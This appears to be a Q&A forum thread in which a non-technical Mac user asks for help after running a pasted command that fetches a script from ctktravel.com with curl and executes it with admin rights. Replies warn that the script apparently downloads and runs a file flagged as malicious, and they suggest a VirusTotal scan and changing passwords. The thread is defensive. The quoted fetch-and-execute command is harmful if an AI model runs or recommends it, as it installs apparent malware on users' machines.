I accidentally ran a command in my terminal that I found online. It was: /bin/bash -c "$(curl -fsSL https://ctktravel.com/get17/install.sh)" from a link I found. After running it, I had to enter my admin password. I'm not very tech-savvy and I'm worried that this could have installed something harmful on my Mac. Can anyone help me understand how to check if the script was malicious? I haven't noticed any changes on my machine yet, but I want to be safe. I know I made a mistake by running this command without understanding what it did, so any guidance would be greatly appreciated!
1 Answer
It's good that you're being cautious! Running that command likely downloaded and executed a binary without you knowing what's in it. Just as a heads-up, some comments suggested looking at the script's contents, and it seems it tries to download another file and executes it, which is a huge red flag! If you haven't already, try running it in a virtual machine or isolated container for analysis. This kind of command can be risky!
Yeah, and it's also worth doing a VirusTotal scan on any files it downloaded. Someone mentioned that the file from this command is flagged as malicious by several antivirus engines. Changing your passwords after running such commands is a prudent step as well.